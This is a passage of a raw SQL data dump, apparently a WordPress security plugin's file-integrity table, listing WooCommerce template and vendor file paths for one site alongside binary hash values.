MxUL:\Z5','wp-content/plugins/woocommerce/templates/checkout/terms.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/checkout/terms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uw+m$$','ȆY`ls-^mf;Un_֐','',0,'?'),('fj)&TF@M7','wp-content/plugins/woocommerce/templates/checkout/thankyou.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/checkout/thankyou.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CYZڶ{NF;','\'\\mUĮ\n]`&OzJ','',0,'?'),(':%txԿ','wp-content/plugins/woocommerce/templates/content-product-cat.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/content-product-cat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*f\\gbIW,','\"&b3hvQ%C`\\~','',0,'?'),('h/8ϕ/7NIF','wp-content/plugins/woocommerce/templates/content-product.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/content-product.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LfR 9\'֯[Q7\rڦXO~bq\0','',0,'?'),('ݨ1qg@-5','wp-content/plugins/woocommerce/templates/emails/customer-processing-order.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/customer-processing-order.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ky4YᔁsN','rUgڇRwxGyڛ\0 a','',0,'?'),('pp%)+cf!E','wp-content/plugins/woocommerce/templates/emails/customer-refunded-order.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/customer-refunded-order.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`92o\ZS|','܊M$r\"VRoɤl','',0,'?'),('C-8_<8j','wp-content/plugins/woocommerce/templates/emails/customer-reset-password.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/customer-reset-password.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ]cBAˇj','y,>5V\06c%l {;wFQ','',0,'?'),('|.Mh\0','wp-content/plugins/woocommerce/templates/emails/email-addresses.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/email-addresses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|+8iot%\0','jk2iH|9h{)ޱ̩','',0,'?'),('Drz(TM?c','wp-content/plugins/woocommerce/templates/emails/email-customer-details.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/email-customer-details.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~o+P;?7DG','m[u-V{U@3߱wyV','',0,'?'),('7$bUH\'c4=','wp-content/plugins/woocommerce/templates/emails/email-downloads.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/email-downloads.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%HV)cx','1Y6k眨FE? tVڰ','',0,'?'),('%.7; $I','wp-content/plugins/woocommerce/templates/emails/email-footer.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/email-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8qO|','h-|3{e̼):2$K b','',0,'?'),(' C a IK','wp-content/plugins/woocommerce/templates/emails/email-header.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/email-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gm.',']>TIA-]a>n\\#+۩A','',0,'?'),('ЁO\'U>ni\'A\'\\','wp-content/plugins/woocommerce/templates/emails/email-mobile-messaging.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/email-mobile-messaging.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A(v\0d}\\','r.G{=؁K#Nc\'jDbD>,','',0,'?'),('K٠];\'Y2','wp-content/plugins/woocommerce/templates/emails/email-order-details.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/email-order-details.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']GG0\' ','3`;.#1yI\Z~; hE6','',0,'?'),('[\0WEGjp茻ox','wp-content/plugins/woocommerce/templates/emails/email-order-items.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/email-order-items.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 7^҃ =Щʭ','Щ.j/(멭!o\Zܥ1=.r','',0,'?'),(';\0]oKS','wp-content/plugins/woocommerce/templates/emails/email-styles.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/email-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' P!P2_',':*Gl&FO츷W]yO!f%Pf','',0,'?'),('0{fHf(V<','wp-content/plugins/woocommerce/templates/emails/plain/admin-cancelled-order.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/plain/admin-cancelled-order.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VRl%qؔ{)(','',0,'?'),('R-b:UqV','wp-content/plugins/woocommerce/templates/emails/plain/admin-new-order.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/plain/admin-new-order.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6ҧ2f','^P ^ &`BeʚMx(9+','',0,'?'),('dm\0$a;','wp-content/plugins/woocommerce/templates/emails/plain/customer-completed-order.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/plain/customer-completed-order.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' VB\"fW\Z','!F>GQ!M\'W}\n(','',0,'?'),('˽lNVb4Xe\"','wp-content/plugins/woocommerce/templates/emails/plain/customer-note.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/plain/customer-note.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+pU|o,','Z5R--zSgCy4V\0hM','',0,'?'),('J\0k\'?~[U1','wp-content/plugins/woocommerce/templates/emails/plain/customer-on-hold-order.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/plain/customer-on-hold-order.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CZ4֕ ','xd7B$b7jDϺd`yّ\\ ','',0,'?'),('WN,\r0rh@','wp-content/plugins/woocommerce/templates/emails/plain/customer-processing-order.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/plain/customer-processing-order.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','& Kx cϲv','y\0t}(BX=̨}Q$}d)y','',0,'?'),('O@=A?q','wp-content/plugins/woocommerce/templates/emails/plain/customer-refunded-order.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/plain/customer-refunded-order.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rv^4Ia8','*X2Sd`*?T.X!U! ','',0,'?'),('3@bIZK','wp-content/plugins/woocommerce/templates/emails/plain/customer-reset-password.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/plain/customer-reset-password.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QXfqXۏ','IS\0ĹeM\nXTE jClR3\r','',0,'?'),('qLis>u_&','wp-content/plugins/woocommerce/templates/emails/plain/email-addresses.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/plain/email-addresses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZvZϕcN&c','OBǒ\r-F;y!0ᯟ','',0,'?'),('kB Eu!\\zCj.','wp-content/plugins/woocommerce/templates/emails/plain/email-customer-details.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/plain/email-customer-details.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(ff4aHزB^',']ÛqI@(\Z<Ob:#xM','',0,'?'),('<1JE@B','wp-content/plugins/woocommerce/templates/emails/plain/email-downloads.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/plain/email-downloads.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(F:[W','Ģ\'J}rztvL|_ kWry','',0,'?'),('{P6 $\'','wp-content/plugins/woocommerce/templates/emails/plain/email-order-details.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/plain/email-order-details.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' mAL*Ӻ wk','E\n+\0%Z\n\0^>xV-tA','',0,'?'),('PK([-F{Xj','wp-content/plugins/woocommerce/templates/emails/plain/email-order-items.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/emails/plain/email-order-items.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' xh+NJ#)Q\'','( v\\ j[\Z뛋R^C','',0,'?'),('F?烺[\\|2f','wp-content/plugins/woocommerce/templates/global/breadcrumb.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/global/breadcrumb.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' qg!ڙ 9',']#@~BԳ?.t5','',0,'?'),('\0`bӪX','wp-content/plugins/woocommerce/templates/global/form-login.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/global/form-login.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i =MPu','݋1<ȗ;>wInu}%.7','',0,'?'),('ݖyUxM ','wp-content/plugins/woocommerce/templates/global/quantity-input.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/global/quantity-input.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ž6N j:]','#l빋•ϟs;zHf}]<\'*xq','',0,'?'),('*Ӵ-q;','wp-content/plugins/woocommerce/templates/global/sidebar.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/global/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/X_kؽUO4y','1D(#}UUř]❸ʗ&iG','',0,'?'),('xvPzC','wp-content/plugins/woocommerce/templates/global/wrapper-end.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/global/wrapper-end.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2b4UrAu','p?[w1I(\'','',0,'?'),('cx]RsR','wp-content/plugins/woocommerce/templates/loop/loop-end.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/loop/loop-end.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ĭ?\0&YY','TGK8<貀&MM(','',0,'?'),('\ZiDՓ$aI','wp-content/plugins/woocommerce/templates/loop/loop-start.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/loop/loop-start.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oDaB4%&^E',']-D)I䮮\r&.0\0\"U߲I!o*ߖAj','',0,'?'),('?{K3Oi|u(','wp-content/plugins/woocommerce/templates/loop/sale-flash.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/loop/sale-flash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yb_L\Zc\n','hdy8F>','GZ]/{kBF-ѕ?W','',0,'?'),('\r/KM2$_1','wp-content/plugins/woocommerce/templates/myaccount/form-login.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/myaccount/form-login.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1p\0:$v','>ٵKnq)bj4T=ur','',0,'?'),('H4?4\n\n?r','wp-content/plugins/woocommerce/templates/myaccount/form-lost-password.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/myaccount/form-lost-password.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E! OlȢ','b-lYE6c}У r\\ň','',0,'?'),('i\nҸdPt','wp-content/plugins/woocommerce/templates/myaccount/form-reset-password.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/myaccount/form-reset-password.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R#aK^U1\rʁ',']hUݗ$wF3VjP0(','',0,'?'),(' t1N򑸺63','wp-content/plugins/woocommerce/templates/myaccount/lost-password-confirmation.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/myaccount/lost-password-confirmation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_ c њUh:','=Sd .FBGYu52(Ն\n6őRg\\','',0,'?'),('T%1KG','wp-content/plugins/woocommerce/templates/myaccount/my-account.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/myaccount/my-account.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SQf7YW','ȹ#|Z\0$::T6m~~L','',0,'?'),('W |','wp-content/plugins/woocommerce/templates/myaccount/my-address.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/myaccount/my-address.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v*^5dx\"_','Nd4Cg+ep;g\n','',0,'?'),('F7mNZ','wp-content/plugins/woocommerce/templates/myaccount/my-downloads.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/myaccount/my-downloads.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','APz ',' =Z nf\rzX+y_S\r','',0,'?'),('Mޯr%\n@','wp-content/plugins/woocommerce/templates/myaccount/my-orders.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/myaccount/my-orders.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3r9=2`','1T*\"+hRzspΩA','',0,'?'),('I~\ZuȠE','wp-content/plugins/woocommerce/templates/myaccount/navigation.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/myaccount/navigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R\'~:=#\Z;W','mɐiFE!!YK,d{ޛb','',0,'?'),('n~Vĝ.۴','wp-content/plugins/woocommerce/templates/myaccount/orders.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/myaccount/orders.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߻P5`믵$','>(:}4\ZKY:=s9ZX','',0,'?'),('E dd9\r x','wp-content/plugins/woocommerce/templates/myaccount/payment-methods.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/myaccount/payment-methods.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y@TB]0V','7%uO)RMBd~Uek 8\'d','',0,'?'),('f+ӏbH)\nE','wp-content/plugins/woocommerce/templates/myaccount/view-order.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/myaccount/view-order.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','16pr4Ww+CX','pշF2Fբ ?w*o:iUOGJ','',0,'?'),('9܏\nhP@[','wp-content/plugins/woocommerce/templates/notices/error.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/notices/error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S8Ԝ$We','sB#]ϕ1FǨdy%d4','',0,'?'),('m','wp-content/plugins/woocommerce/templates/notices/notice.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/notices/notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hg|MpfV_','G[','wp-content/plugins/woocommerce/templates/order/order-again.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/order/order-again.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xa#̙ؠ.}R','B}Q7\"Fb|µ^<K','',0,'?'),('[͌qq̬Td','wp-content/plugins/woocommerce/templates/order/order-details-customer.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/order/order-details-customer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zq^3[KJ _\"','ӀfDI\r^|8vOJRu','',0,'?'),('+iK? G:i; ','wp-content/plugins/woocommerce/templates/order/order-details-item.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/order/order-details-item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DjvFԠӞi3\"','+O2p7P/ I |','',0,'?'),('{*CU','wp-content/plugins/woocommerce/templates/order/order-details.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/order/order-details.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hů\0\"3\'','',0,'?'),(']p[%3QLVs','wp-content/plugins/woocommerce/templates/order/tracking.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/order/tracking.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bly]xƒ\'','CNL%{=q` QWMx#','',0,'?'),('sg~=Bf','wp-content/plugins/woocommerce/templates/product-searchform.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/product-searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':A&Hj*h4x','A,H5O)Ƶ\rq Hs','',0,'?'),('D&ͩw&Zn','wp-content/plugins/woocommerce/templates/single-product/add-to-cart/external.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/single-product/add-to-cart/external.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nmuɣ%ձG(','5- \'zW肇,\0ǙxUgL8ō','',0,'?'),(':ܳg','wp-content/plugins/woocommerce/templates/single-product/add-to-cart/grouped.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/single-product/add-to-cart/grouped.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^j4\\)%n',')_.. W','',0,'?'),('x5Ӟ6/Z6کӛ','wp-content/plugins/woocommerce/templates/single-product/add-to-cart/variation-add-to-cart-button.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/single-product/add-to-cart/variation-add-to-cart-button.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',').2Z]f(0Z','%$9GL¸\"Ie','',0,'?'),('?߅#~̏b@','wp-content/plugins/woocommerce/templates/single-product/add-to-cart/variation.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/single-product/add-to-cart/variation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*hQ&r\rI','\0e0\'F3o\0.\\ml 5A>U','',0,'?'),('wT+ UD','wp-content/plugins/woocommerce/templates/single-product/meta.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/single-product/meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DK:\n}','HoE`\0wTjȐ_n;,$1','',0,'?'),('x?N0ٴeۈH','wp-content/plugins/woocommerce/templates/single-product/photoswipe.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/single-product/photoswipe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z8hG','\Z`A*J\Z/q(','',0,'?'),('Y}mc/F =e\n[[0(TI,ߦ۳','',0,'?'),('Ⱥ>6k笤','wp-content/plugins/woocommerce/templates/single-product/short-description.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/single-product/short-description.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|>RVؽ','Ԑ$Cj%DŹv/u§-u4&','',0,'?'),('g:Hu>D','wp-content/plugins/woocommerce/templates/single-product/stock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/single-product/stock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9 a؂)U.uf','zƷ<>fum>ONy','',0,'?'),('T)$K8Ú[','wp-content/plugins/woocommerce/templates/single-product/tabs/additional-information.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/single-product/tabs/additional-information.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_=G؝,5[z%','z pI{eu81M#bɗu','',0,'?'),('.y#ji]P3','wp-content/plugins/woocommerce/templates/single-product/tabs/description.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/single-product/tabs/description.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','={>f7','tEb9a?\'TY7','',0,'?'),('aISy1ߟB ','wp-content/plugins/woocommerce/templates/single-product/tabs/tabs.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/single-product/tabs/tabs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_z$7iNdz','HDu 󵇧:5ƈBe\r','',0,'?'),(':5χF,p','wp-content/plugins/woocommerce/templates/single-product/title.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/single-product/title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8\0>]Fݰ','4={xʑxk3EfW','',0,'?'),('sdg[+','wp-content/plugins/woocommerce/templates/single-product/up-sells.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/single-product/up-sells.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A\rΑ!&:','>];[y%E\Z\"-44vg/^4','',0,'?'),('rS:`e࿸B','wp-content/plugins/woocommerce/templates/single-product-reviews.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/single-product-reviews.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}w^\',','4@=O\\K\0\'P$Q_\rs','',0,'?'),('m?Tן4s#','wp-content/plugins/woocommerce/templates/single-product.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/single-product.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oh3q0`)πQ1','i[:`=4#[(ZjC','',0,'?'),('JB.}!<','wp-content/plugins/woocommerce/templates/taxonomy-product-attribute.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/taxonomy-product-attribute.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'؆iC*9W\0','Ua;z鉿BԦHhThޫ\'Ǹ,','',0,'?'),(' B e?O+k','wp-content/plugins/woocommerce/templates/taxonomy-product-cat.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/taxonomy-product-cat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dgwdsr\r]','M|Rz TwN-Dތl','',0,'?'),('.!L)|lO!','wp-content/plugins/woocommerce/templates/taxonomy-product-tag.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/templates/taxonomy-product-tag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QoѸAd@','::qy\Z޺ESqQgI:(','',0,'?'),('Zz_)YuP','wp-content/plugins/woocommerce/uninstall.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/uninstall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`4ܩ-@','B7ӶsB\\!&{2G','',0,'?'),('ʣ/˺SD =','wp-content/plugins/woocommerce/vendor/autoload.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L[D@WT','>A/Ra.F] \00^','',0,'?'),('˙&۸&p','wp-content/plugins/woocommerce/vendor/autoload_packages.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/vendor/autoload_packages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gZ I6A=\"','+G_fWt8\'#܋!oc','',0,'?'),('Ьc.','wp-content/plugins/woocommerce/vendor/automattic/jetpack-a8c-mc-stats/LICENSE.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/vendor/automattic/jetpack-a8c-mc-stats/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mgSf0afK','g̓f_HQc','wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/AutoloadFileWriter.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/AutoloadFileWriter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T;֑<& kf3#pO8B|cC','',0,'?'),('57J\rŧx-','wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/class-autoloader-handler.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/class-autoloader-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UGʼLhqI','&`ɡq\\zC۩jH 6 \rg<9','',0,'?'),('3T3~eN','wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/class-autoloader-locator.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/class-autoloader-locator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7MRC(IZ','*rޢo}k=Q\Z\',@j;:\nw','',0,'?'),('7 00(&wK\Z','wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/class-autoloader.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/class-autoloader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kl#\\TH','G1ђ\ŕ \nOeߩP','',0,'?'),('uįpۦ','wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/class-container.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/class-container.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xBÃQ\"}5','\'\'\re8\"rMqwa^','',0,'?'),('cr\\\r\0bU','wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/class-hook-manager.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/class-hook-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KUҗׇ','rm_u4gAz]&A-^i29','',0,'?'),('R>IgW7^','wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/class-latest-autoloader-guard.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/class-latest-autoloader-guard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~BԲ>z','&`_`9TTkNy5z`^i9o','',0,'?'),(' ]`TI7','wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/class-manifest-reader.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/class-manifest-reader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CrIvwj','s3h U$a[IzΠ$I}N²','',0,'?'),('6X)9Xdg*>','wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/class-path-processor.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/class-path-processor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zO\nJYgU{','TAwpvdyu+7 D& J8','',0,'?'),('hdR1ck\nxNb','wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/class-php-autoloader.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/class-php-autoloader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']_bvE9M3','#:k\Z\0o#P]\nm','',0,'?'),('~͚\\e','wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/class-plugin-locator.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/class-plugin-locator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|a>K (=&p\n','#m7\"\nڨ6$\n_LGgx','',0,'?'),('7M(','wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/class-plugins-handler.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/class-plugins-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' a~:KH','qtS6 ڈ#5[','',0,'?'),('u9gVϽ\r69у','wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/class-shutdown-handler.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/vendor/automattic/jetpack-autoloader/src/class-shutdown-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kw9;\rR+\"N','y6![1dQݎ,r:Ze )pN','',0,'?'),('p[QZR— 